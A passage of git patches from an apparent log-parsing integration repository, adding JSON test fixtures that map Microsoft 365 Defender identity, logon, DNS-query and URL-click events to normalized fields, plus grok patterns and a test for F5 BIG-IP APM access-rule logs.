--engine=2\",\"InitiatingProcessParentCreationTime\":\"2022-09-01T06:56:23.595229Z\",\"InitiatingProcessParentId\":15532,\"InitiatingProcessParentFileName\":\"software_reporter_tool.exe\",\"DeviceId\":\"1111111111111111111111111111111111111111\",\"AppGuardContainerId\":\"\",\"MachineGroup\":\"UnassignedGroup\",\"Timestamp\":\"2022-09-01T07:09:47.4980566Z\",\"DeviceName\":\"test.lab\",\"ReportId\":104061}}",
     "event": {
+      "category": [
+        "iam"
+      ],
+      "dataset": "identity_info",
       "type": [
-        "info"
+        "user"
       ]
     },
     "@timestamp": "2022-09-01T07:09:47.498056Z",
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
new file mode 100644
index 000000000..de75ec66d
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_info_2.json
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:13:23.4712503Z\", \"tenantId\": \"a1616f45-c922-4c95-acca-f69494cb464e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityInfo\", \"_TimeReceivedBySvc\": \"2024-10-03T11:13:23.4430000Z\", \"properties\": {\"Timestamp\": \"2024-10-03T11:13:23.0234783Z\", \"ReportId\": \"6aefc315-d9e5-4230-81b4-c2d0b40b6282\", \"AccountName\": \"123456\", \"AccountDomain\": \"itg.local\", \"AccountUpn\": \"johndoe@example.com\", \"AccountObjectId\": \"b1ea6dde-2f60-4c1c-ba51-a929e2dba958\", \"AccountDisplayName\": \"DOE John\", \"GivenName\": \"Emma\", \"Surname\": \"TSCHAEN\", \"Department\": null, \"JobTitle\": null, \"EmailAddress\": \"johndoe@example.com\", \"Manager\": null, \"Address\": null, \"City\": null, \"Country\": null, \"Phone\": null, \"CreatedDateTime\": \"2024-07-20T02:45:30Z\", \"DistinguishedName\": \"CN=DOE John,OU=PGE,OU=Student,DC=itg,DC=local\", \"OnPremSid\": \"S-1-5-21-2308620423-2764619233-3639949770-5127445\", \"CloudSid\": \"S-1\", \"IsAccountEnabled\": true, \"SourceProvider\": \"AzureActiveDirectory\", \"ChangeSource\": \"AzureActiveDirectory\", \"BlastRadius\": null, \"CompanyName\": null, \"DeletedDateTime\": null, \"EmployeeId\": null, \"OtherMailAddresses\": null, \"RiskLevel\": null, \"RiskLevelDetails\": null, \"State\": null, \"Tags\": [], \"CriticalityLevel\": null, \"SipProxyAddress\": \"\", \"Type\": \"User\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "iam"
+      ],
+      "dataset": "identity_info",
+      "type": [
+        "user"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:13:23.023478Z",
+    "action": {
+      "properties": {
+        "AccountUPN": "johndoe@example.com"
+      }
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "6aefc315-d9e5-4230-81b4-c2d0b40b6282"
+        }
+      }
+    },
+    "related": {
+      "user": [
+        "123456"
+      ]
+    },
+    "user": {
+      "domain": "itg.local",
+      "full_name": "DOE John",
+      "name": "123456"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json
new file mode 100644
index 000000000..2d87d3742
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon_2.json
@@ -0,0 +1,58 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:27:16.2140248Z\", \"tenantId\": \"9f97a043-faf0-4df7-b467-57f7bb72740c\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:24:42.5340000Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"OAuth2:Authorize\", \"Protocol\": null, \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"john.doe\", \"AccountDomain\": \"example.com\", \"AccountSid\": null, \"AccountObjectId\": \"9a5a5efc-e558-41d2-b3da-2c4e953eb5c4\", \"IPAddress\": \"1.2.3.4\", \"Location\": \"FR\", \"DeviceName\": null, \"OSPlatform\": \"Windows 10\", \"DeviceType\": \"Desktop\", \"ISP\": \"neoma business school\", \"DestinationDeviceName\": null, \"TargetDeviceName\": null, \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"ACTOR.ENTITY_USER\": \"John DOE\", \"ACTOR.ALIAS\": \"John DOE\", \"ARG.CLOUD_SERVICE\": \"Editor Browser Extension\", \"Pass-through authentication\": \"false\", \"Request ID\": \"62a44e8f-2f30-4146-a8c6-047e526e282f\"}, \"ReportId\": \"8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9\", \"Timestamp\": \"2024-10-03T11:23:16.963Z\", \"Application\": \"Microsoft 365\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:27:16.2140248Z\", \"tenantId\": \"9f97a043-faf0-4df7-b467-57f7bb72740c\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:24:42.5340000Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"OAuth2:Authorize\", \"Protocol\": null, \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"john.doe\", \"AccountDomain\": \"example.com\", \"AccountSid\": null, \"AccountObjectId\": \"9a5a5efc-e558-41d2-b3da-2c4e953eb5c4\", \"IPAddress\": \"1.2.3.4\", \"Location\": \"FR\", \"DeviceName\": null, \"OSPlatform\": \"Windows 10\", \"DeviceType\": \"Desktop\", \"ISP\": \"neoma business school\", \"DestinationDeviceName\": null, \"TargetDeviceName\": null, \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"ACTOR.ENTITY_USER\": \"John DOE\", \"ACTOR.ALIAS\": \"John DOE\", \"ARG.CLOUD_SERVICE\": \"Editor Browser Extension\", \"Pass-through authentication\": \"false\", \"Request ID\": \"62a44e8f-2f30-4146-a8c6-047e526e282f\"}, \"ReportId\": \"8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9\", \"Timestamp\": \"2024-10-03T11:23:16.963Z\", \"Application\": \"Microsoft 365\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "identity_logon_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:23:16.963000Z",
+    "action": {
+      "properties": {
+        "AccountUPN": "john.doe@example.com",
+        "Application": "Microsoft 365",
+        "ISP": "neoma business school",
+        "Location": "FR",
+        "LogonType": "OAuth2:Authorize"
+      },
+      "type": "LogonSuccess"
+    },
+    "host": {
+      "os": {
+        "full": "Windows 10"
+      },
+      "type": "Desktop"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "8e17f393c95c1233d67d61d282ae7b2d4609afa97cc74f68e75dc171e9d691e9"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "john.doe"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "user": {
+      "domain": "example.com",
+      "full_name": "John DOE",
+      "name": "john.doe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json b/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json
new file mode 100644
index 000000000..68556eb65
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_logon_3.json
@@ -0,0 +1,49 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-01T08:33:28.2285123Z\", \"tenantId\": \"3f1c3ba0-b477-46a2-bc02-d908ed2f548e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:19.6154094Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"Resource access\", \"Protocol\": \"Ntlm\", \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"johndoe\", \"AccountDomain\": \"example.com\", \"AccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"AccountObjectId\": \"f701b0c2-2089-481d-ac5c-39707efbb9fe\", \"IPAddress\": null, \"Location\": null, \"DeviceName\": null, \"OSPlatform\": null, \"DeviceType\": null, \"ISP\": null, \"DestinationDeviceName\": \"srv-dc3.example1.com\", \"TargetDeviceName\": \"srv-radiusnps.example1.com\", \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"Count\": \"1\", \"Category\": \"Credential Access\", \"AttackTechniques\": \"Steal or Forge Kerberos Tickets (T1558), Kerberoasting (T1558.003)\", \"IsResourceAccountTrustedForUnconstrainedDelegation\": \"False\", \"SourceAccountId\": \"9db21c13-c6e8-40ed-ae14-d94c75ac9419\", \"SourceAccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"DestinationComputerObjectGuid\": \"ef496270-3384-4ca2-97c2-fdc70f595ded\", \"DestinationComputerOperatingSystem\": \"windows server 2019 standard\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"TargetComputerObjectGuid\": \"86183b3b-79d4-4b7e-a291-488c20fe495b\", \"TargetComputerOperatingSystem\": \"windows server 2019 datacenter\", \"TargetComputerOperatingSystemVersion\": \"10.0 (17763)\", \"TargetComputerOperatingSystemType\": \"windows\", \"ACTOR.ACCOUNT\": \"John DOE\", \"ACTOR.ENTITY_USER\": \"John DOE\", \"TO.DEVICE\": \"SRV-DC3\", \"TARGET_OBJECT.DEVICE\": \"SRV-RADIUSNPS\"}, \"ReportId\": \"9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e\", \"Timestamp\": \"2024-10-01T08:29:14.6761149Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-01T08:33:28.2285123Z\", \"tenantId\": \"3f1c3ba0-b477-46a2-bc02-d908ed2f548e\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityLogonEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:19.6154094Z\", \"properties\": {\"ActionType\": \"LogonSuccess\", \"LogonType\": \"Resource access\", \"Protocol\": \"Ntlm\", \"AccountDisplayName\": \"John DOE\", \"AccountUpn\": \"john.doe@example.com\", \"AccountName\": \"johndoe\", \"AccountDomain\": \"example.com\", \"AccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"AccountObjectId\": \"f701b0c2-2089-481d-ac5c-39707efbb9fe\", \"IPAddress\": null, \"Location\": null, \"DeviceName\": null, \"OSPlatform\": null, \"DeviceType\": null, \"ISP\": null, \"DestinationDeviceName\": \"srv-dc3.example1.com\", \"TargetDeviceName\": \"srv-radiusnps.example1.com\", \"FailureReason\": null, \"Port\": null, \"DestinationPort\": null, \"DestinationIPAddress\": null, \"TargetAccountDisplayName\": null, \"AdditionalFields\": {\"Count\": \"1\", \"Category\": \"Credential Access\", \"AttackTechniques\": \"Steal or Forge Kerberos Tickets (T1558), Kerberoasting (T1558.003)\", \"IsResourceAccountTrustedForUnconstrainedDelegation\": \"False\", \"SourceAccountId\": \"9db21c13-c6e8-40ed-ae14-d94c75ac9419\", \"SourceAccountSid\": \"S-1-5-21-1614895754-1343024091-1177238915-9841\", \"DestinationComputerObjectGuid\": \"ef496270-3384-4ca2-97c2-fdc70f595ded\", \"DestinationComputerOperatingSystem\": \"windows server 2019 standard\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"TargetComputerObjectGuid\": \"86183b3b-79d4-4b7e-a291-488c20fe495b\", \"TargetComputerOperatingSystem\": \"windows server 2019 datacenter\", \"TargetComputerOperatingSystemVersion\": \"10.0 (17763)\", \"TargetComputerOperatingSystemType\": \"windows\", \"ACTOR.ACCOUNT\": \"John DOE\", \"ACTOR.ENTITY_USER\": \"John DOE\", \"TO.DEVICE\": \"SRV-DC3\", \"TARGET_OBJECT.DEVICE\": \"SRV-RADIUSNPS\"}, \"ReportId\": \"9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e\", \"Timestamp\": \"2024-10-01T08:29:14.6761149Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "dataset": "identity_logon_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-01T08:29:14.676114Z",
+    "action": {
+      "properties": {
+        "AccountSid": "S-1-5-21-1614895754-1343024091-1177238915-9841",
+        "AccountUPN": "john.doe@example.com",
+        "Application": "Active Directory",
+        "DestinationDeviceName": "srv-dc3.example1.com",
+        "LogonType": "Resource access",
+        "TargetDeviceName": "srv-radiusnps.example1.com"
+      },
+      "type": "LogonSuccess"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "9afc4a29-e0a6-4bd0-9afa-1faf1ee6da5e"
+        }
+      }
+    },
+    "network": {
+      "protocol": "Ntlm"
+    },
+    "related": {
+      "user": [
+        "johndoe"
+      ]
+    },
+    "user": {
+      "domain": "example.com",
+      "full_name": "John DOE",
+      "name": "johndoe"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json b/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json
new file mode 100644
index 000000000..9b162e127
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_identity_query_2.json
@@ -0,0 +1,55 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-01T08:33:55.2270559Z\", \"tenantId\": \"d8454584-ffe7-430e-9123-2b0c51f35475\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityQueryEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:45.9638646Z\", \"properties\": {\"ActionType\": \"DNS query\", \"QueryTarget\": \"1.cnr.io\", \"Protocol\": \"Dns\", \"AccountDisplayName\": null, \"AccountUpn\": null, \"AccountName\": null, \"AccountDomain\": null, \"AccountSid\": null, \"AccountObjectId\": null, \"Query\": null, \"IPAddress\": \"5.6.7.8\", \"Location\": null, \"DeviceName\": \"SRV-FILES\", \"QueryType\": \"Text\", \"DestinationDeviceName\": \"srv-dc1.example.com\", \"TargetAccountDisplayName\": null, \"TargetDeviceName\": null, \"Port\": 38529, \"DestinationPort\": 53, \"DestinationIPAddress\": \"1.2.3.4\", \"TargetAccountUpn\": null, \"AdditionalFields\": {\"Count\": \"1\", \"ARG.TASK\": \"DNS query\", \"SourceComputerOperatingSystemType\": \"unknown\", \"DestinationComputerObjectGuid\": \"bbcbe3ae-1e7a-432f-ae9d-a8e58e38ce8b\", \"DestinationComputerOperatingSystem\": \"windows server 2019 datacenter\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"SourceComputerId\": \"computer domain office srv-files\", \"FROM.DEVICE\": \"SRV-FILES\", \"TO.DEVICE\": \"SRV-DC1\", \"ACTOR.DEVICE\": \"\"}, \"ReportId\": \"b127257b-9688-4f71-ae86-93e4e4a39464\", \"Timestamp\": \"2024-10-01T08:32:08.211673Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-01T08:33:55.2270559Z\", \"tenantId\": \"d8454584-ffe7-430e-9123-2b0c51f35475\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-IdentityQueryEvents\", \"_TimeReceivedBySvc\": \"2024-10-01T08:32:45.9638646Z\", \"properties\": {\"ActionType\": \"DNS query\", \"QueryTarget\": \"1.cnr.io\", \"Protocol\": \"Dns\", \"AccountDisplayName\": null, \"AccountUpn\": null, \"AccountName\": null, \"AccountDomain\": null, \"AccountSid\": null, \"AccountObjectId\": null, \"Query\": null, \"IPAddress\": \"5.6.7.8\", \"Location\": null, \"DeviceName\": \"SRV-FILES\", \"QueryType\": \"Text\", \"DestinationDeviceName\": \"srv-dc1.example.com\", \"TargetAccountDisplayName\": null, \"TargetDeviceName\": null, \"Port\": 38529, \"DestinationPort\": 53, \"DestinationIPAddress\": \"1.2.3.4\", \"TargetAccountUpn\": null, \"AdditionalFields\": {\"Count\": \"1\", \"ARG.TASK\": \"DNS query\", \"SourceComputerOperatingSystemType\": \"unknown\", \"DestinationComputerObjectGuid\": \"bbcbe3ae-1e7a-432f-ae9d-a8e58e38ce8b\", \"DestinationComputerOperatingSystem\": \"windows server 2019 datacenter\", \"DestinationComputerOperatingSystemVersion\": \"10.0 (17763)\", \"DestinationComputerOperatingSystemType\": \"windows\", \"SourceComputerId\": \"computer domain office srv-files\", \"FROM.DEVICE\": \"SRV-FILES\", \"TO.DEVICE\": \"SRV-DC1\", \"ACTOR.DEVICE\": \"\"}, \"ReportId\": \"b127257b-9688-4f71-ae86-93e4e4a39464\", \"Timestamp\": \"2024-10-01T08:32:08.211673Z\", \"Application\": \"Active Directory\"}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "iam"
+      ],
+      "dataset": "identity_query_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-01T08:32:08.211673Z",
+    "action": {
+      "properties": {
+        "Application": "Active Directory",
+        "DestinationDeviceName": "srv-dc1.example.com",
+        "QueryTarget": "1.cnr.io",
+        "QueryType": "Text"
+      },
+      "type": "DNS query"
+    },
+    "destination": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "port": 53
+    },
+    "host": {
+      "name": "SRV-FILES"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "b127257b-9688-4f71-ae86-93e4e4a39464"
+        }
+      }
+    },
+    "network": {
+      "protocol": "Dns"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "source": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_url_click_events.json b/Microsoft/microsoft-365-defender/tests/test_url_click_events.json
new file mode 100644
index 000000000..3e80bed25
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_url_click_events.json
@@ -0,0 +1,53 @@
+{
+  "input": {
+    "message": "{\"time\": \"2024-10-03T11:23:25.9069421Z\", \"tenantId\": \"bcee9af7-3fd7-4c29-b238-eeb1dc4b46d8\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-UrlClickEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:23:00.0292845Z\", \"properties\": {\"ReportId\": \"2ad2033f-6f85-49bb-9ab7-e67f791edd93\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"NetworkMessageId\": \"703451b5-2f1e-4c4b-8494-3f5bf8820f3b\", \"Timestamp\": \"2024-10-03T11:22:59Z\", \"AccountUpn\": \"john.doe@example.com\", \"UrlChain\": \"[\\\"https://example.com/index.php?q=some+stuff\\\",\\\"https://example.com/index.php?q=some+stuff&p=2\\\"]\", \"ActionType\": \"ClickAllowed\", \"ThreatTypes\": null, \"DetectionMethods\": null, \"Workload\": \"Email\", \"IPAddress\": \"1.2.3.4\", \"IsClickedThrough\": false}, \"Tenant\": \"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\": \"2024-10-03T11:23:25.9069421Z\", \"tenantId\": \"bcee9af7-3fd7-4c29-b238-eeb1dc4b46d8\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-UrlClickEvents\", \"_TimeReceivedBySvc\": \"2024-10-03T11:23:00.0292845Z\", \"properties\": {\"ReportId\": \"2ad2033f-6f85-49bb-9ab7-e67f791edd93\", \"Url\": \"https://example.com/index.php?q=some+stuff\", \"NetworkMessageId\": \"703451b5-2f1e-4c4b-8494-3f5bf8820f3b\", \"Timestamp\": \"2024-10-03T11:22:59Z\", \"AccountUpn\": \"john.doe@example.com\", \"UrlChain\": \"[\\\"https://example.com/index.php?q=some+stuff\\\",\\\"https://example.com/index.php?q=some+stuff&p=2\\\"]\", \"ActionType\": \"ClickAllowed\", \"ThreatTypes\": null, \"DetectionMethods\": null, \"Workload\": \"Email\", \"IPAddress\": \"1.2.3.4\", \"IsClickedThrough\": false}, \"Tenant\": \"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "web"
+      ],
+      "dataset": "url_click_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-10-03T11:22:59Z",
+    "action": {
+      "properties": {
+        "AccountUPN": "john.doe@example.com"
+      },
+      "type": "ClickAllowed"
+    },
+    "email": {
+      "local_id": "703451b5-2f1e-4c4b-8494-3f5bf8820f3b"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "2ad2033f-6f85-49bb-9ab7-e67f791edd93"
+        }
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    },
+    "url": {
+      "domain": "example.com",
+      "original": "https://example.com/index.php?q=some+stuff",
+      "path": "/index.php",
+      "port": 443,
+      "query": "q=some+stuff",
+      "registered_domain": "example.com",
+      "scheme": "https",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file

From b65ceefda764cefb10db127235fdad3f77320d4c Mon Sep 17 00:00:00 2001
From: "vladyslav.guriev" <vladyslav.guriev@gmail.com>
Date: Tue, 8 Oct 2024 18:53:22 +0300
Subject: [PATCH 122/317] Fix: F5 Big Ip APM events support

---
 F5 Networks/f5-big-ip/_meta/fields.yml        |  5 +++
 .../f5-big-ip/_meta/smart-descriptions.json   |  8 ++++
 F5 Networks/f5-big-ip/ingest/parser.yml       | 13 +++++-
 .../f5-big-ip/tests/test_apm_access_1.json    | 45 +++++++++++++++++++
 .../f5-big-ip/tests/test_apm_access_2.json    | 45 +++++++++++++++++++
 .../f5-big-ip/tests/test_apm_access_3.json    | 44 ++++++++++++++++++
 .../f5-big-ip/tests/test_apm_access_4.json    | 44 ++++++++++++++++++
 .../tests/session_integrity.json              | 14 ++++--
 8 files changed, 212 insertions(+), 6 deletions(-)
 create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_1.json
 create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_2.json
 create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_3.json
 create mode 100644 F5 Networks/f5-big-ip/tests/test_apm_access_4.json

diff --git a/F5 Networks/f5-big-ip/_meta/fields.yml b/F5 Networks/f5-big-ip/_meta/fields.yml
index de3380c4b..5ba8e71be 100644
--- a/F5 Networks/f5-big-ip/_meta/fields.yml	
+++ b/F5 Networks/f5-big-ip/_meta/fields.yml	
@@ -37,3 +37,8 @@ f5.bigip.afm.vlan:
   description: ''
   name: f5.bigip.afm.vlan
   type: keyword
+
+f5.bigip.apm.rule_item:
+  description: ''
+  name: f5.bigip.apm.rule_item
+  type: keyword
diff --git a/F5 Networks/f5-big-ip/_meta/smart-descriptions.json b/F5 Networks/f5-big-ip/_meta/smart-descriptions.json
index bfd90ed31..3864c1402 100644
--- a/F5 Networks/f5-big-ip/_meta/smart-descriptions.json	
+++ b/F5 Networks/f5-big-ip/_meta/smart-descriptions.json	
@@ -73,5 +73,13 @@
       { "field": "source.address" },
       { "field": "destination.address" }
     ]
+  },
+  {
+    "value": "Rule {rule.name} triggered by {source.address} on item {f5.bigip.apm.rule_item}",
+    "conditions": [
+      { "field": "rule.name" },
+      { "field": "source.address" },
+      { "field": "f5.bigip.apm.rule_item" }
+    ]
   }
 ]
diff --git a/F5 Networks/f5-big-ip/ingest/parser.yml b/F5 Networks/f5-big-ip/ingest/parser.yml
index 77ee4ea1b..01f4599e3 100644
--- a/F5 Networks/f5-big-ip/ingest/parser.yml	
+++ b/F5 Networks/f5-big-ip/ingest/parser.yml	
@@ -112,12 +112,15 @@ pipeline:
         output_field: message
         pattern: '%{HEADER}?%{DATA:rule_name}\:\s*%{WORD}\:\s*%{WORD}\:\s*%{PAYLOAD}'
         custom_patterns:
-          HEADER: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )'
-          PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}"
+          HEADER: '%{HEADER_1}|%{HEADER_2}'
+          HEADER_1: '%{DATA:date} %{TIME:time} %{IPORHOST:source_domain} %{DATA:action_type} %{DATA}\[\d*\]:\s*(\d*:\d*: )'
+          HEADER_2: '\s*%{WORD:action_type}\[\d*\]:\s*(\d*:\d*: )'
+          PAYLOAD: "%{PAYLOAD_USER}|%{PAYLOAD_USER_AUTH_WITH_DOMAIN}|%{PAYLOAD_USER_AUTH}|%{PAYLOAD_NEW_SESSION}|%{PAYLOAD_ACCESS}"
           PAYLOAD_USER: "Username '%{DATA:user_name}'"
           PAYLOAD_USER_AUTH: ".*authenticate with '%{DATA:user_name}'.*"
           PAYLOAD_USER_AUTH_WITH_DOMAIN: ".*authenticate with '%{DATA:user_name}@%{DATA:user_domain}'.*"
           PAYLOAD_NEW_SESSION: 'New session from \s*client IP %{IP:src_ip} \(%{DATA}\) at VIP %{IP:dest_ip}.*'
+          PAYLOAD_ACCESS: "Following rule '%{DATA:rule_name}' from item '%{DATA:rule_item}' to %{DATA} '%{DATA}'"
 
   - name: set_apm_event
     filter: "{{ parse_apm_event.message != None }}"
@@ -334,6 +337,12 @@ stages:
           event.type: ["start"]
         filter: "{{parse_apm_event.message.PAYLOAD_USER_AUTH != None or parse_apm_event.message.PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}"
 
+      - set:
+          rule.name: "{{parse_apm_event.message.rule_name}}"
+          f5.bigip.apm.rule_item: "{{parse_apm_event.message.rule_item}}"
+          source.domain: "{{parse_apm_event.message.source_domain}}"
+        filter: "{{parse_apm_event.message.PAYLOAD_ACCESS != None}}"
+
       - set:
           action.target: "network-traffic"
 
diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json
new file mode 100644
index 000000000..570d31153
--- /dev/null
+++ b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json	
@@ -0,0 +1,45 @@
+{
+  "input": {
+    "message": "Sep 11 07:54:59 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_test:DMZ:111111: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'"
+  },
+  "expected": {
+    "message": "Sep 11 07:54:59 test.test.com notice apmd[14311]: 01490005:5: /DMZ/APM_ADSB_test:DMZ:111111: Following rule 'GONE API user' from item 'AD Query' to ending 'Allow'",
+    "event": {
+      "category": [
+        "authentication"
+      ],
+      "type": [
+        "info"
+      ]
+    },
+    "action": {
+      "target": "network-traffic"
+    },
+    "f5": {
+      "bigip": {
+        "apm": {
+          "rule_item": "AD Query"
+        }
+      }
+    },
+    "os": {
+      "family": "linux",
+      "platform": "linux"
+    },
+    "related": {
+      "hosts": [
+        "test.test.com"
+      ]
+    },
+    "rule": {
+      "name": "GONE API user"
+    },
+    "source": {
+      "address": "test.test.com",
+      "domain": "test.test.com",
+      "registered_domain": "test.com",
+      "subdomain": "test",
+      "top_level_domain": "com"
+    }
+  }
+}
\ No newline at end of file
